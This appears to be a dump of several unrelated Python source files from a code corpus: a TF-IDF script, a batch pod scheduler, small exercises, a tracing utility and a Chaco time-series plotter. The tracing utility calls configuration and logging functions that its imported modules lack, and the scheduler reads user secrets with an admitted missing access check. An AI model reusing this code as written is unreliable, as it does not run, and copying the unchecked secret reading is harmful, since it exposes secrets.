\"hash_key\" : oneDoc[\"_source\"][\"hash_key\"],\n \"post_title\" : oneDoc[\"_source\"][\"post_title\"],\n \"content\" : oneDoc[\"_source\"][\"post_body\"]\n }\n )\n return corpus\n\ndef filterEmptyDoc (corpus):\n hash_key = []\n titles = []\n contents = []\n\n for idx, doc in enumerate(corpus):\n if doc[\"content\"] != \"\":\n hash_key.append(doc[\"hash_key\"])\n titles.append(doc[\"post_title\"])\n contents.append(doc[\"content\"])\n \n return {\"hash_key\" : hash_key, \"titles\" : titles, \"contents\" : contents}\n\ndef dataPrePrcs(corpus):\n cnt = 0\n hashList = corpus[\"hash_key\"]\n titles = corpus[\"titles\"]\n contents = corpus[\"contents\"]\n import re\n rex1 = re.compile('[^가-힣0-9*.?,!]')#한글 숫자 자주 쓰는 문자만 취급\n \n tagger = Mecab()\n for i,c in enumerate(contents):\n try:\n c = rex1.sub(\" \",c)\n except Exception:\n # print(\"에러 : title : \", titles[i], \", content : \", c)# 문서 내용이 None\n cnt = cnt+1\n # print(cnt)\n \n num_co = 0\n tokenized_doc = []\n failIdxList = []\n \n for i, c in enumerate(contents):\n num_co = num_co + 1\n try:\n t = tagger.nouns(c)\n tokenized_doc.append(t)\n 
except:\n failIdxList.append(i)\n for idx in reversed(failIdxList):\n hashList.pop(idx)\n titles.pop(idx)\n\n\n # 한글자 단어들 지우기!\n num_doc = len(tokenized_doc)\n for i in range(num_doc):\n tokenized_doc[i] = [word for word in tokenized_doc[i] if len(word) > 1]\n \n return hashList, titles, tokenized_doc, contents\n\n\ndef runAnalysis(resp):\n # Create corpus object\n print(\"Create corpus\")\n corpus = makeCorpus(resp)\n \n # Take only non-empty data\n print(\"Filter Empty Data\")\n corpus = filterEmptyDoc(corpus) \n\n # Tokenize documents\n print(\"Tokenize Data\")\n (hash_key, titles, tokenized_doc, contents) = dataPrePrcs(corpus)\n\n # Dictionarize documents\n print(\"Dictionarize Data\")\n dictionarizedDoc = corpora.Dictionary(tokenized_doc)\n\n # Tfidif Modeling\n print(\"Modeling Data\")\n corpus = corpus = [dictionarizedDoc.doc2bow(line) for line in tokenized_doc]\n tfidfModel = TfidfModel(corpus)\n\n sortedWords = []\n # Sort by tfidf value\n for id, word_list in enumerate(tfidfModel[corpus]):\n word_list = sorted(word_list, key=itemgetter(1), reverse = True) \n sortedWords.append((id, word_list))\n print(\"Sort Data: \")\n\n # Create Object of tfidf\n print(\"Create Result Object\")\n result = []\n for i, wordValuePair in sortedWords:\n wordValuePair = sortedWords[i]\n tfidfWord = []\n for idx, (wordId, tfidfValue) in enumerate(wordValuePair[1]):\n tfidfWord.append((dictionarizedDoc[wordId], tfidfValue))\n result.append({\"hash_key\": hash_key[i], \"docTitle\": titles[i], \"tfidf\": tfidfWord})\n\n return result\n\ndef createJson(result, count):\n # Save into Json format\n with open(\"{dir}{num}.json\".format(dir=DIR_EntireTfidf, num=count), 'w', -1, \"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False)\n\n# 2021.01.07 YHJ\ndef getAllTfidfTable():\n count = 0\n # Get first 100 data\n resp = es.search( \n index = ESindex, \n body = { \"size\":100, \"query\": { \"match_all\" : {} } }, \n scroll='10m'\n )\n\n # Save Scroll id for next search\n scrollId = resp[\"_scroll_id\"]\n\n analysisResult = runAnalysis(resp)\n createJson(analysisResult, count)\n\n print(\"Done with the first set\")\n cmm.showTime()\n \n while len(resp['hits']['hits']):\n count = count + 1\n print(\"start set #{}\".format(count))\n resp = es.scroll( \n scroll_id = scrollId, \n scroll='10m'\n ) \n analysisResult = runAnalysis(resp)\n createJson(analysisResult, count)\n print(\"done with #{}\".format(count))\n cmm.showTime()\n\nif __name__ == \"__main__\":\n getAllTfidfTable() \n","sub_path":"tfidf_all.py","file_name":"tfidf_all.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"200905719","text":"import os\nimport json\nimport asyncio\nimport aiohttp\nfrom aiohttp import web\nimport logging\nimport google.oauth2.service_account\nimport sortedcontainers\n\nfrom hailtop.config import get_deploy_config\nfrom hailtop.utils import AsyncWorkerPool, request_retry_transient_errors\n\nfrom ..google_compute import GServices\nfrom ..utils import parse_cpu_in_mcpu\n\nfrom .instance_pool import InstancePool\n\nlog = logging.getLogger('driver')\n\nBATCH_JOB_DEFAULT_CPU = os.environ.get('HAIL_BATCH_JOB_DEFAULT_CPU', '1')\nBATCH_JOB_DEFAULT_MEMORY = os.environ.get('HAIL_BATCH_JOB_DEFAULT_MEMORY', '3.75G')\n\n\nclass Pod:\n @staticmethod\n def from_record(driver, record):\n batch_id = record['batch_id']\n job_spec = json.loads(record['job_spec'])\n userdata = json.loads(record['userdata'])\n status = json.loads(record['status']) 
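tfidf_all.py above pipes tokenized documents through gensim's Dictionary and TfidfModel before sorting terms by weight; the core of that step in isolation (toy tokens; assumes gensim is installed):

from gensim import corpora
from gensim.models import TfidfModel

docs = [["cat", "dog", "cat"], ["dog", "bird"], ["cat", "bird", "bird"]]
dictionary = corpora.Dictionary(docs)
bow = [dictionary.doc2bow(doc) for doc in docs]
tfidf = TfidfModel(bow)

# Highest-weighted terms first, mirroring the sort in runAnalysis.
for doc in tfidf[bow]:
    print(sorted(((dictionary[wid], round(w, 3)) for wid, w in doc),
                 key=lambda pair: -pair[1]))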
if record['status'] else None\n\n inst = driver.inst_pool.token_inst.get(record['instance'])\n\n pod = Pod(\n driver=driver,\n name=record['name'],\n batch_id=batch_id,\n job_spec=job_spec,\n userdata=userdata,\n output_directory=record['output_directory'],\n cores_mcpu=record['cores_mcpu'],\n status=status,\n instance=inst)\n\n if inst:\n inst.schedule(pod)\n\n return pod\n\n @staticmethod\n async def create_pod(driver, name, batch_id, job_spec, userdata, output_directory):\n cpu = None\n resources = job_spec.get('resources')\n if resources:\n cpu = resources.get('cpu')\n if not cpu:\n cpu = BATCH_JOB_DEFAULT_CPU\n cores_mcpu = parse_cpu_in_mcpu(cpu)\n\n await driver.db.pods.new_record(name=name, batch_id=batch_id, job_spec=json.dumps(job_spec),\n userdata=json.dumps(userdata), output_directory=output_directory,\n cores_mcpu=cores_mcpu, instance=None)\n\n return Pod(driver, name, batch_id, job_spec, userdata, output_directory, cores_mcpu)\n\n def __init__(self, driver, name, batch_id, job_spec, userdata, output_directory, cores_mcpu, instance=None, on_ready=False, status=None):\n self.driver = driver\n self.name = name\n self.batch_id = batch_id\n self.job_spec = job_spec\n self.userdata = userdata\n self.output_directory = output_directory\n self.cores_mcpu = cores_mcpu\n self.instance = instance\n self.on_ready = on_ready\n self._status = status\n self.deleted = False\n\n loop = asyncio.get_event_loop()\n self.lock = asyncio.Lock(loop=loop)\n\n async def config(self):\n job_spec = dict(self.job_spec)\n\n # copy secrets\n if 'secrets' in job_spec:\n job_spec['secrets'] = [dict(secret) for secret in job_spec['secrets']]\n\n # update resources with defaults\n if 'resources' not in job_spec:\n job_spec['resources'] = {}\n resources = job_spec['resources']\n if 'cpu' not in resources:\n resources['cpu'] = BATCH_JOB_DEFAULT_CPU\n if 'memory' not in resources:\n resources['memory'] = BATCH_JOB_DEFAULT_MEMORY\n\n # add user's gsa-key\n secrets = job_spec.get('secrets', [])\n secrets = list(secrets)\n secrets.append({\n 'namespace': 'batch-pods', # FIXME unused\n 'name': self.userdata['gsa_key_secret_name'],\n 'mount_path': '/gsa-key',\n 'mount_in_copy': True\n })\n job_spec['secrets'] = secrets\n\n secret_futures = []\n for secret in secrets:\n # FIXME need access control to verify user is allowed to access secret\n secret_futures.append(self.driver.k8s.read_secret(secret['name']))\n k8s_secrets = await asyncio.gather(*secret_futures)\n\n for secret, k8s_secret in zip(secrets, k8s_secrets):\n if k8s_secret:\n secret['data'] = k8s_secret.data\n\n return {\n 'name': self.name,\n 'batch_id': self.batch_id,\n 'user': self.userdata['username'],\n 'job_spec': job_spec,\n 'output_directory': self.output_directory\n }\n\n async def mark_complete(self, status):\n self._status = status\n await self.driver.db.pods.update_record(self.name, status=json.dumps(status))\n\n def mark_deleted(self):\n assert not self.deleted\n self.deleted = True\n self.remove_from_ready()\n\n async def unschedule(self):\n if not self.instance:\n return\n\n log.info(f'unscheduling {self.name} with {self.cores_mcpu / 1000} cores from {self.instance}')\n\n self.instance.unschedule(self)\n self.instance = None\n await self.driver.db.pods.update_record(self.name, instance=None)\n\n async def schedule(self, inst):\n async with self.lock:\n assert not self.instance\n\n self.remove_from_ready()\n\n if self.deleted:\n log.info(f'not scheduling {self.name} on {inst.name}; pod already deleted')\n return False\n\n if self._status:\n 
log.info(f'not scheduling {self.name} on {inst.name}; pod already complete')\n return False\n\n if not inst.active:\n log.info(f'not scheduling {self.name} on {inst.name}; instance not active')\n asyncio.ensure_future(self.put_on_ready())\n return False\n\n if not inst.healthy:\n log.info(f'not scheduling {self.name} on {inst.name}; instance not healthy')\n asyncio.ensure_future(self.put_on_ready())\n return False\n\n log.info(f'scheduling {self.name} with {self.cores_mcpu / 1000} cores on {inst}')\n\n inst.schedule(self)\n\n self.instance = inst\n\n # FIXME: is there a way to eliminate this blocking the scheduler?\n await self.driver.db.pods.update_record(self.name, instance=inst.token)\n return True\n\n async def put_on_ready(self):\n # FIXME: does this need a lock?\n assert not self.on_ready\n\n if self._status:\n log.info(f'{self.name} already complete, ignoring put on ready')\n return\n\n if self.deleted:\n log.info(f'{self.name} already deleted, ignoring put on ready')\n return\n\n await self.unschedule()\n\n await self.driver.ready_queue.put(self)\n self.on_ready = True\n self.driver.ready_cores_mcpu += self.cores_mcpu\n self.driver.changed.set()\n\n def remove_from_ready(self):\n if self.on_ready:\n self.on_ready = False\n self.driver.ready_cores_mcpu -= self.cores_mcpu\n\n async def _request(self, method, url, **kwargs):\n try:\n async with aiohttp.ClientSession(\n raise_for_status=True, timeout=aiohttp.ClientTimeout(total=60)) as session:\n resp = await request_retry_transient_errors(session, method, url, **kwargs)\n if self.instance:\n self.instance.mark_as_healthy()\n return resp\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception:\n if self.instance:\n self.instance.mark_as_unhealthy()\n raise\n\n async def create(self):\n async with self.lock:\n assert not self.on_ready\n\n config = await self.config()\n\n if self.deleted:\n log.info(f'pod already deleted {self.name}')\n return\n\n if not self.instance:\n log.info(f'instance was deactivated before {self.name} could be created; rescheduling')\n asyncio.ensure_future(self.put_on_ready())\n return\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/create'\n try:\n await self._request('POST', url, json=config)\n log.info(f'created {self.name} on inst {inst}')\n except Exception:\n log.exception(f'failed to create {self.name} on inst {inst}, putting back on ready queue')\n asyncio.ensure_future(self.put_on_ready())\n\n async def delete(self):\n assert self.deleted\n\n async with self.lock:\n inst = self.instance\n if inst:\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/delete'\n try:\n await self._request('POST', url)\n log.info(f'deleted {self.name} from inst {inst}')\n except Exception:\n log.exception(f'failed to delete {self.name} on inst {inst} due to exception, ignoring')\n\n await self.unschedule()\n await self.driver.db.pods.delete_record(self.name)\n\n async def read_pod_logs(self):\n log.info(f'reading pod {self.name} logs from instance {self.instance}')\n\n if self.instance is None:\n return None\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/logs'\n resp = self._request('GET', url)\n return await resp.json()\n\n async def read_pod_status(self):\n log.info(f'reading status for pod {self.name} from instance {self.instance}')\n\n if self.instance is None:\n return None\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/status'\n resp = 
self._request('GET', url)\n return await resp.json()\n\n def status(self):\n if self._status is None:\n # don't know yet\n return {\n 'name': self.name,\n 'batch_id': self.batch_id,\n 'job_id': self.job_spec['job_id'],\n 'user': self.userdata['username'],\n 'state': 'pending'\n }\n return self._status\n\n def __str__(self):\n return self.name\n\n\nclass Driver:\n def __init__(self, db, k8s, batch_bucket, batch_gsa_key=None):\n self.db = db\n self.k8s = k8s\n self.batch_bucket = batch_bucket\n self.pods = None # populated in run\n self.complete_queue = asyncio.Queue()\n self.ready_queue = asyncio.Queue(maxsize=1000)\n self.ready = sortedcontainers.SortedSet(key=lambda pod: pod.cores_mcpu)\n self.ready_cores_mcpu = 0\n self.changed = asyncio.Event()\n\n self.pool = None # created in run\n\n deploy_config = get_deploy_config()\n\n self.base_url = deploy_config.base_url('batch2')\n\n self.inst_pool = InstancePool(self)\n\n if batch_gsa_key is None:\n batch_gsa_key = os.environ.get('BATCH_GSA_KEY', '/batch-gsa-key/privateKeyData')\n credentials = google.oauth2.service_account.Credentials.from_service_account_file(batch_gsa_key)\n\n self.gservices = GServices(self.inst_pool.machine_name_prefix, credentials)\n\n async def activate_worker(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n ip_address = body['ip_address']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'/activate_worker from unknown inst {inst_token}')\n raise web.HTTPNotFound()\n\n log.info(f'activating instance {inst}')\n await inst.activate(ip_address)\n inst.mark_as_healthy()\n return web.Response()\n\n async def deactivate_worker(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'/deactivate_worker from unknown instance {inst_token}')\n raise web.HTTPNotFound()\n\n log.info(f'received /deactivate_worker from instance {inst}')\n await inst.deactivate()\n inst.mark_as_healthy()\n return web.Response()\n\n async def pod_complete(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n status = body['status']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'pod_complete from unknown instance {inst_token}')\n raise web.HTTPNotFound()\n inst.mark_as_healthy()\n\n pod_name = status['name']\n pod = self.pods.get(pod_name)\n if pod is None:\n log.warning(f'pod_complete from unknown pod {pod_name}, instance {inst_token}')\n return web.HTTPNotFound()\n log.info(f'pod_complete from pod {pod_name}, instance {inst_token}')\n await pod.mark_complete(status)\n await self.complete_queue.put(status)\n return web.Response()\n\n async def create_pod(self, name, batch_id, job_spec, userdata, output_directory):\n assert name not in self.pods\n pod = await Pod.create_pod(self, name, batch_id, job_spec, userdata, output_directory)\n self.pods[name] = pod\n await pod.put_on_ready()\n\n async def delete_pod(self, name):\n pod = self.pods[name]\n pod.mark_deleted()\n await self.pool.call(pod.delete)\n # this must be after delete finishes successfully in case pod marks complete before delete call\n del self.pods[name]\n\n async def read_pod_logs(self, name):\n return await self.pods[name].read_pod_logs()\n\n async def read_pod_status(self, name):\n return await self.pods[name].read_pod_status()\n\n def list_pods(self):\n return [pod.status() for _, pod in self.pods.items()]\n\n async def schedule(self):\n 
log.info('scheduler started')\n\n self.changed.clear()\n should_wait = False\n while True:\n if should_wait:\n await self.changed.wait()\n self.changed.clear()\n\n while len(self.ready) < 50 and not self.ready_queue.empty():\n pod = self.ready_queue.get_nowait()\n if not pod.deleted:\n self.ready.add(pod)\n else:\n log.info(f'skipping pod {pod} from ready queue, already deleted')\n pod.remove_from_ready()\n\n should_wait = True\n if self.inst_pool.instances_by_free_cores and self.ready:\n inst = self.inst_pool.instances_by_free_cores[-1]\n i = self.ready.bisect_key_right(inst.free_cores_mcpu)\n if i > 0:\n pod = self.ready[i - 1]\n assert pod.cores_mcpu <= inst.free_cores_mcpu\n self.ready.remove(pod)\n should_wait = False\n scheduled = await pod.schedule(inst) # This cannot go in the pool!\n if scheduled:\n await self.pool.call(pod.create)\n\n async def initialize(self):\n await self.inst_pool.initialize()\n\n self.pool = AsyncWorkerPool(100)\n\n def _pod(record):\n pod = Pod.from_record(self, record)\n return pod.name, pod\n\n records = await self.db.pods.get_all_records()\n self.pods = dict(_pod(record) for record in records)\n\n async def put_all_on_ready():\n for pod in self.pods.values():\n if not pod.instance and not pod._status:\n await pod.put_on_ready()\n\n asyncio.ensure_future(put_all_on_ready())\n\n async def run(self):\n await self.inst_pool.start()\n await self.schedule()\n","sub_path":"batch2/batch/driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":15588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"147827331","text":"# In order travesal\r\n# Binary tree\r\nclass Node:\r\n\tdef __init__(self, val=0, left=None, right=None):\r\n\t\tself.val = val\r\n\t\tself.left = left\r\n\t\tself.right = right\r\n\t\t\r\ndef inorder(node):\r\n\tif node is None:\r\n\t\treturn\r\n\tinorder(node.left)\r\n\tprint(node.val)\r\n\tinorder(node.right)\r\n\r\nroot = Node(12)\r\nroot.left = Node(6)\r\nroot.right = Node(4)\r\n\r\ninorder(root)\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"89195258","text":"while True:\r\n first_num=input(\"First number for division (Enter q for quit): \")\r\n\r\n if first_num==\"q\":\r\n break\r\n\r\n second_num=input(\"Second number: \")\r\n\r\n try:\r\n num1=int(first_num)\r\n num2=int(second_num)\r\n print(num1,\"/\",num2,\"=\",num1/num2)\r\n except (ValueError,ZeroDivisionError):\r\n print(\"Error!\")\r\n print(\"Please try again!\")\r\n","sub_path":"en-US_iftryexc.py","file_name":"en-US_iftryexc.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"555699087","text":"#!/usr/bin/env python\n\"\"\"\ntracing utility\n\n\"\"\"\n# (c) Copyright 2019 Hewlett Packard Enterprise Development LP\n\n__author__ = \"Paul Carlton \"\n__copyright__ = \"Copyright (C) 2016 Paul Carlton\"\n__license__ = \"Public Domain\"\n__version__ = \"0.2\"\n__date__ = \"18 October 2016\"\n\nimport sys\nimport os\nimport logging\nimport configparser\n\nfrom prclib.tracelib import tracer\n\ncfg = configparser.ConfigParser()\n\nCLI_OPTS = [\n cfg.StrOpt('dir-path',\n deprecated_group=\"DEFAULT\",\n default='.',\n help='Directory to process.'),\n cfg.BoolOpt('flake-check',\n deprecated_group=\"DEFAULT\",\n default=False,\n help='Turn on flake8 checking of modified files, '\n 
'defaults to off'),\n]\ncfg.CONF.register_cli_opts(CLI_OPTS)\n\n\nLOG = logging.getLogger(__name__)\n\nfrom prclib.traceutils import SetTracing\nPY_EXT = \".py\"\nblack_list = ['tracelib.py', 'LOG.py']\n\n\n@tracer.func_wrapper\ndef process_dirs(dir_path):\n\n    @tracer.func_wrapper\n    def process_file(filepath):\n        if get_file_name(filepath) in black_list:\n            LOG.info('Skipping black listed file: %s', filepath)\n            return\n        if not filepath.endswith('.py'):\n            LOG.info('Skipping non python file: %s', filepath)\n            return\n        LOG.info('processing file: %s', filepath)\n        set_trace = SetTracing(filepath, cfg.CONF.flake_check)\n        updated = set_trace.set_tracing()\n        if not updated:\n            LOG.info('File: %s not updated', filepath)\n\n    @tracer.func_wrapper\n    def get_file_name(filepath):\n        last_slash = filepath.rfind('/')\n        if last_slash < 0:\n            return filepath\n        else:\n            return filepath[last_slash + 1:]\n\n    if not os.path.isdir(dir_path):\n        LOG.warning('%s is not a directory', dir_path)\n        return\n    for root, dirs, files in os.walk(dir_path):\n        LOG.info('Directory: %s', root)\n        for filename in sorted(files):\n            file_path = os.path.join(root, filename)\n            try:\n                process_file(file_path)\n            except Exception as e:\n                LOG.error('Failed to process file: %s', file_path)\n                LOG.error('Exception: %s', str(e))\n\n\n@tracer.func_wrapper\ndef process(argv):\n\n    logging.register_options(cfg.CONF)\n    cfg.CONF(argv, project=\"trace\", prog=\"enabler\")\n    logging.setup(cfg.CONF, 'trace')\n\n    cfg.CONF.log_opt_values(LOG, logging.DEBUG)\n\n    if cfg.CONF.dir_path:\n        LOG.info(\"Base directory set by command line: %s\", cfg.CONF.dir_path)\n        walk_dir = cfg.CONF.dir_path\n    else:\n        walk_dir = \".\"\n        LOG.info(\"Base directory defaulting to: %s\",\n                 os.path.abspath(walk_dir))\n\n    process_dirs(walk_dir)\n\n\n@tracer.func_wrapper\ndef main():\n    process(sys.argv[1:])\n\nif __name__ == '__main__':\n    main()\n","sub_path":"tools/enable_tracing.py","file_name":"enable_tracing.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412624722","text":"\"\"\" ENAML VERSION\r\nImplement a Chaco data plotter that loads pandas data from an hdf5 file\r\nor directly from the object.\r\nThe plotter contains zoom, pan, and legend highlighter tools and preserves\r\nthe datetime tick labels.\r\n\r\nTODO list:\r\n- Catch the closing of the window and close the hdf file\r\n- Rethink the layout of the window.\r\n- Add more commonly used tools on these timeseries.\r\n- support netCDF and other self describing files in addition to HDF\r\n- Embed into a general application which contains the gsod_collect script to \r\nmake an end-to-end mini-application with an ipython prompt. 
Use envisage task (or \r\ncanopy?).\r\n\"\"\"\r\n\r\n# Major library imports\r\nimport os\r\nimport pandas\r\nimport numpy as np\r\n\r\n# Enthought imports\r\nfrom enable.api import ComponentEditor\r\nfrom traits.api import HasTraits, Instance, Dict, File, Bool, Enum, List, \\\r\n on_trait_change, Int, Str, Any\r\nfrom traitsui.api import View, Item, VGroup, HSplit\r\n\r\n# Chaco imports\r\nfrom chaco.api import ArrayPlotData, ToolbarPlot, PlotAxis\r\nfrom chaco.tools.api import PanTool, ZoomTool, LegendHighlighter, \\\r\n RangeSelection, RangeSelectionOverlay\r\n# for datetime tick labels\r\nfrom chaco.scales.api import CalendarScaleSystem\r\nfrom chaco.scales_tick_generator import ScalesTickGenerator\r\n\r\n# Use of Pandas in Chaco\r\nfrom chaco_pandas import pandas_hdf_to_data_dict, pandas2array_dict\r\n\r\ncolors = [\"black\", \"green\", \"red\", \"blue\", \"lightblue\", \"lightgreen\",\r\n \"pink\", \"yellow\", \"darkgray\", \"silver\"]\r\n\r\n# Tool names:\r\nCORRELATION = \"Correlation\"\r\nMA = \"Plot vs Moving averages\"\r\n\r\ndef attach_tools(plot):\r\n \"\"\" Little utility function to attach plot tools: zoom, pan and legend tools\r\n \"\"\"\r\n plot.tools.append(PanTool(plot))\r\n zoom = ZoomTool(component=plot, tool_mode=\"range\", axis = \"index\", always_on=False)\r\n plot.overlays.append(zoom)\r\n # Show legend\r\n plot.legend.visible = True\r\n plot.legend.align = \"lr\"\r\n # Legend Highlighter: allows to click on the line in the legend to show that one\r\n highlight_tool = LegendHighlighter(plot.legend)\r\n plot.tools.append(highlight_tool)\r\n\r\nclass GSODDataPlotterView(HasTraits):\r\n \"\"\" Application of the zoom tool to the GSOD plotting tool.\r\n Load a HDF file containing one or more timeseries and plot the entire data inside.\r\n The zoom tool allows to explore a subset of it. The legend allows to (de)select some\r\n timeseries.\r\n \"\"\"\r\n # UI controls\r\n data_file = File()\r\n\r\n # Tool controls\r\n tool_list = List([MA, CORRELATION])\r\n tool_chooser = Enum(values=\"tool_list\")\r\n ts_list = List()\r\n ts1_chooser = Enum(values=\"ts_list\")\r\n ts2_chooser = Enum(values=\"ts_list\")\r\n # Moving average window size (in number of observations)\r\n ma_window_size = Int(0) \r\n # Analysis details\r\n ts_analysis_details = Str(\"No details available\")\r\n \r\n # Data\r\n ts_data = Dict()\r\n arr_plot_data = Instance(ArrayPlotData, ())\r\n times_ds = Any() # arraydatasource for the time axis data\r\n index_is_dates = Bool()\r\n\r\n # Plots\r\n ts_plot = Instance(ToolbarPlot, ())\r\n ts_analysis_plot = Instance(ToolbarPlot, ())\r\n\r\n def trait_view(self, view):\r\n \"\"\" Build the view. 
The local namespace is \r\n \"\"\"\r\n return View(\r\n VGroup(Item('data_file', style='simple', label=\"HDF file to load\"), \r\n HSplit(Item('ts_plot', editor=ComponentEditor(size=(400, 600)), \r\n show_label=False),\r\n VGroup(Item('tool_chooser', show_label = True, label=\"Choose tool\"),\r\n Item('ts1_chooser', label=\"TS 1\"),\r\n Item('ts2_chooser', label=\"TS 2\",\r\n visible_when=\"tool_chooser in ['%s']\" % CORRELATION),\r\n Item('ma_window_size', label=\"MA window size\",\r\n visible_when=\"tool_chooser in ['%s']\" % MA),\r\n Item('ts_analysis_plot', editor=ComponentEditor(size=(400, 600)), \r\n show_label=False),\r\n Item('ts_analysis_details', show_label = False, style = 'readonly', \r\n visible_when=(\"tool_chooser in ['%s']\" % CORRELATION))),),\r\n ),\r\n title='Time-series plotter and analyzer',\r\n width=1300, height=800, resizable=True)\r\n\r\n def __init__(self, pandas_list = [], array_dict = {}, *args, **kw):\r\n \"\"\" If a (list of) pandas or a dict of arrays is passed, load them up. \r\n \"\"\"\r\n # Initialize the data content of the analysis tool\r\n ts_data = {}\r\n super(GSODDataPlotterView, self).__init__(*args, **kw)\r\n if not isinstance(pandas_list, list):\r\n pandas_list = [pandas_list]\r\n if pandas_list:\r\n array_dict_from_pandas, self.index_is_dates = pandas2array_dict(pandas_list)\r\n ts_data.update(array_dict_from_pandas)\r\n if array_dict:\r\n ts_data.update(array_dict)\r\n\r\n if ts_data:\r\n # Now trigger the plot redraw\r\n self.ts_data = ts_data \r\n \r\n\r\n def _data_file_changed(self):\r\n \"\"\" Update the data from the HDF5 file.\r\n \"\"\"\r\n ts_data, self.index_is_dates = pandas_hdf_to_data_dict(self.data_file)\r\n assert(\"index\" in ts_data)\r\n self.ts_data = ts_data\r\n\r\n def _ts_data_changed(self):\r\n \"\"\" Dataset has changed: update the plots.\r\n ENH: add the possibility to pass a dict to ArrayPlotData constructor.\r\n \"\"\"\r\n for k,v in self.ts_data.items():\r\n self.arr_plot_data.set_data(k,v)\r\n self.ts_list = self.ts_data.keys()\r\n self.update_main_plot()\r\n self.update_analysis_plot()\r\n \r\n def update_main_plot(self):\r\n \"\"\" Build main plot\r\n \"\"\"\r\n self.ts_plot = ToolbarPlot(self.arr_plot_data)\r\n for i, k in enumerate([k for k in self.ts_data.keys() if k != \"index\"]):\r\n renderer = self.ts_plot.plot((\"index\", k), name = k, color = colors[i % len(colors)])[0]\r\n if self.index_is_dates:\r\n # Index was an array of datetime: overwrite the x axis\r\n self.ts_plot.x_axis = None\r\n x_axis = PlotAxis(self.ts_plot, orientation=\"bottom\",\r\n tick_generator=ScalesTickGenerator(scale=CalendarScaleSystem()))\r\n self.ts_plot.overlays.append(x_axis)\r\n self.ts_plot.x_grid.tick_generator = x_axis.tick_generator\r\n \r\n if self.data_file:\r\n self.ts_plot.title = (\"Time series visualization from %s\" \r\n % (os.path.split(self.data_file)[1]))\r\n else:\r\n self.ts_plot.title = \"Time series visualization\"\r\n attach_tools(self.ts_plot)\r\n\r\n # Attach the range selection to the last renderer; any one will do\r\n self.ts_plot.tools.append(RangeSelection(renderer, left_button_selects = False,\r\n auto_handle_event = False))\r\n # Attach the corresponding overlay\r\n self._range_selection_overlay = RangeSelectionOverlay(renderer,\r\n metadata_name=\"selections\")\r\n self.ts_plot.overlays.append(self._range_selection_overlay)\r\n # Grab a reference to the Time axis datasource and add a listener to its\r\n # selections metadata\r\n self.times_ds = renderer.index\r\n 
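# Note: _selections_changed (defined below) redraws the analysis plot only while\r\n        # the Correlation tool is active; other tools ignore range selections.\r\n        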
self.times_ds.on_trait_change(self._selections_changed)\r\n\r\n def _selections_changed(self, event):\r\n \"\"\" Selection of a time range on the first plot will triger a redraw of \r\n the correlation plot if present.\r\n \"\"\"\r\n if self.tool_chooser != CORRELATION:\r\n return\r\n if not isinstance(event, dict) or \"selections\" not in event:\r\n return\r\n corr_index = self.corr_renderer.index\r\n selections = event[\"selections\"]\r\n if selections is None:\r\n corr_index.metadata.pop(\"selections\", None)\r\n return\r\n else:\r\n low, high = selections\r\n data = self.times_ds.get_data()\r\n low_ndx = data.searchsorted(low)\r\n high_ndx = data.searchsorted(high)\r\n corr_index.metadata[\"selections\"] = np.arange(low_ndx, high_ndx+1, 1, dtype=int)\r\n self.ts_analysis_plot.request_redraw()\r\n\r\n @on_trait_change(\"tool_chooser, ts1_chooser, ts2_chooser, ma_window_size\")\r\n def update_analysis_plot(self):\r\n \"\"\" Build analysis plot\r\n \"\"\"\r\n self.ts_analysis_plot = ToolbarPlot(self.arr_plot_data)\r\n if self.tool_chooser == CORRELATION:\r\n self.corr_renderer = self.ts_analysis_plot.plot((self.ts1_chooser, \r\n self.ts2_chooser), type = \"scatter\", color = \"blue\")[0]\r\n self.ts_analysis_plot.title = \"%s plotted against %s\" % (self.ts1_chooser, self.ts2_chooser)\r\n self.ts_analysis_plot.index_axis.title = self.ts1_chooser\r\n self.ts_analysis_plot.value_axis.title = self.ts2_chooser\r\n elif self.tool_chooser == MA and self.ma_window_size > 0:\r\n ts1_ma = pandas.rolling_mean(self.arr_plot_data.get_data(self.ts1_chooser),\r\n self.ma_window_size)\r\n self.arr_plot_data.set_data(\"ts1_ma\", ts1_ma)\r\n self.ts_analysis_plot.plot((\"index\", self.ts1_chooser), type = \"scatter\", color = \"blue\")\r\n self.ts_analysis_plot.plot((\"index\", \"ts1_ma\"), type = \"line\", color = \"blue\")\r\n \r\n @on_trait_change(\"tool_chooser, ts1_chooser, ts2_chooser\")\r\n def update_analysis_details(self):\r\n if self.tool_chooser == CORRELATION:\r\n # Compute the correlation coefficients between the chosen TS\r\n ts1 = pandas.Series(self.ts_data[self.ts1_chooser])\r\n ts2 = pandas.Series(self.ts_data[self.ts2_chooser])\r\n corr_coefs = ts1.corr(ts2), ts1.corr(ts2, method = 'spearman'), ts1.corr(ts2, method = 'kendall') \r\n self.ts_analysis_details = (\"Coefficients of correlation: Std = %5.3f, Spearman = %5.3f, Kendall = %5.3f.\" % corr_coefs)\r\n return \r\n \r\nif __name__ == \"__main__\":\r\n model = GSODDataPlotterView()\r\n import enaml\r\n with enaml.imports():\r\n from gsod_plot_view import StatsView\r\n view = 